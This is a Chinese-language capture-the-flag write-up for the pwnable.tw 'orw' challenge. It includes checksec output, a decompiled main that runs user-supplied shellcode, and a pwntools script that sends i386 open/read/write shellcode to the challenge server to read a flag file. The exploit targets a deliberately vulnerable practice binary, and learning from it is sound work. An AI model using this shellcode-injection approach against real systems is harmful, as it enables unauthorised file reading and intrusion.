题目要求:
Read the flag from /home/orw/flag.
Only openreadwritesyscallare allowed to use.
0x01
checksec
kk@ubuntu:~/Desktop/black/pwnable.tw/orw$ checksec ./orw
[*] '/home/kk/Desktop/black/pwnable.tw/orw/orw'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
ida
主要考察编写shellcode的能力
int __cdecl main(int argc, const char **argv, const char **envp)
{
orw_seccomp();
printf("Give my your shellcode:");
read(0, &shellcode, 0xC8u);
((void (*)(void))shellcode)();
return 0;
}
0x02
先用c语言写出来,只能只用write,read,open函数 [ 测试时记得现在本地创立/home/orw/flag ]
#include<stdio.h>
int main(void)
{
int fd;
char buf[100] = {0};
fd = fopen("/home/orw/flag", "r");
fscanf(fd, "%s", buf);
printf("%s\n", buf);
close(fd);
return 0;
}
kk@ubuntu:~/Desktop/black/pwnable.tw/orw$ gcc test.c -o test
kk@ubuntu:~/Desktop/black/pwnable.tw/orw$ ./test
flag{aaaa}
查看汇编
pwndbg> disass main
Dump of assembler code for function main:
0x0000000000400666 <+0>: push rbp
0x0000000000400667 <+1>: mov rbp,rsp
0x000000000040066a <+4>: add rsp,0xffffffffffffff80
0x000000000040066e <+8>: mov rax,QWORD PTR fs:0x28
0x0000000000400677 <+17>: mov QWORD PTR [rbp-0x8],rax
0x000000000040067b <+21>: xor eax,eax
0x000000000040067d <+23>: lea rdx,[rbp-0x70]
0x0000000000400681 <+27>: mov eax,0x0
0x0000000000400686 <+32>: mov ecx,0xc
0x000000000040068b <+37>: mov rdi,rdx
0x000000000040068e <+40>: rep stos QWORD PTR es:[rdi],rax
0x0000000000400691 <+43>: mov rdx,rdi
0x0000000000400694 <+46>: mov DWORD PTR [rdx],eax
0x0000000000400696 <+48>: add rdx,0x4
0x000000000040069a <+52>: mov edx,0x0
0x000000000040069f <+57>: mov esi,0x0
0x00000000004006a4 <+62>: mov edi,0x4007a4
0x00000000004006a9 <+67>: mov eax,0x0
0x00000000004006ae <+72>: call 0x400550 <open@plt>
0x00000000004006b3 <+77>: mov DWORD PTR [rbp-0x74],eax
0x00000000004006b6 <+80>: lea rcx,[rbp-0x70]
0x00000000004006ba <+84>: mov eax,DWORD PTR [rbp-0x74]
0x00000000004006bd <+87>: mov edx,0x64
0x00000000004006c2 <+92>: mov rsi,rcx
0x00000000004006c5 <+95>: mov edi,eax
0x00000000004006c7 <+97>: mov eax,0x0
0x00000000004006cc <+102>: call 0x400530 <read@plt>
0x00000000004006d1 <+107>: lea rax,[rbp-0x70]
0x00000000004006d5 <+111>: mov edx,0x64
0x00000000004006da <+116>: mov rsi,rax
0x00000000004006dd <+119>: mov edi,0x1
0x00000000004006e2 <+124>: mov eax,0x0
0x00000000004006e7 <+129>: call 0x400500 <write@plt>
0x00000000004006ec <+134>: mov eax,DWORD PTR [rbp-0x74]
0x00000000004006ef <+137>: mov edi,eax
0x00000000004006f1 <+139>: mov eax,0x0
0x00000000004006f6 <+144>: call 0x400520 <close@plt>
0x00000000004006fb <+149>: mov eax,0x0
0x0000000000400700 <+154>: mov rsi,QWORD PTR [rbp-0x8]
0x0000000000400704 <+158>: xor rsi,QWORD PTR fs:0x28
0x000000000040070d <+167>: je 0x400714 <main+174>
0x000000000040070f <+169>: call 0x400510 <__stack_chk_fail@plt>
0x0000000000400714 <+174>: leave
0x0000000000400715 <+175>: ret
End of assembler dump.
这其实没啥用,但是可以简单理解一下
总之流程就是,先用open打开文件,再读到指定地址,然后打印出来
恰好第一题start也是考察shellcode,同样也用到了汇编中的系统调用:
int 80h的5号程序:sys_open
int 80h的4号程序:sys_write
int 80h的3号程序:sys_read
(百度int 80h系统调用号)
0x03
#!usr/bin/python
from pwn import *
io = remote('chall.pwnable.tw', 10001)
# io = process('./orw')
shellcode = '''
mov eax,0x5 #open(file,0,0);
xor ecx,ecx
push ecx
push 0x67616c66
push 0x2f2f2f77
push 0x726f2f65
push 0x6d6f682f
mov ebx,esp
xor ecx,ecx
xor edx,edx
int 0x80
mov eax,0x3 #read(3,file,0x50);
mov ecx, ebx
mov ebx, 0x3
mov edx, 0x50
int 0x80
mov eax,0x4 #write(1,file,0x50);
mov ebx,0x1
mov edx,0x50
int 0x80
'''
shellcode = asm(shellcode)
io.recv()
io.sendline(shellcode)
io.interactive()
用'''注释'''不一般都是用来注释吗。。。我还第一次知道这种用法呢...每日迷惑
网友评论